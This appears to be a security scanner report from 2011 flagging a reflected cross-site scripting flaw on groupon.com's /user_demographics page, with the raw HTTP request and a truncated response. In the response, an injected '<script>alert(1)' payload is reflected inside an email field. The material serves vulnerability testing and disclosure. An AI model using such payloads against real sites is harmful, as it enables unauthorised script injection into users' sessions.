1. Cross-site scripting (reflected)
Severity: | Information |
Confidence: | Certain |
Host: | http://www.groupon.com |
Path: | /user_demographics |
GET /user_demographics Host: www.groupon.com Proxy-Connection: keep-alive Referer: http://www.groupon.com x-requested-with: XMLHttpRequest content-type: application/x-www-form accept: text/javascript, text/html, application/xml, text/xml, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: b=2148c93a-394a-11e0-aca6 |
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Tue, 01 Mar 2011 17:29:41 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: subscriber_email=test Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=san-jose; path=/; expires=Fri, 01-Apr-2011 17:29:41 GMT Set-Cookie: email=test%40fastdial.net Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _thepoint=c34d720c80 Status: 200 ETag: "8ef21b84a48ea392c57 X-Runtime: 44 Cache-Control: private, max-age=0, must-revalidate Connection: close <div class='clearfix' id='above_main'> <div class='demographic_banner clearfix' id='demographic <form action="/user_demogr ...[SNIP]... <div title='test@fastdial test@fastdial.net16b2a<script>alert(1)< </div> ...[SNIP]... |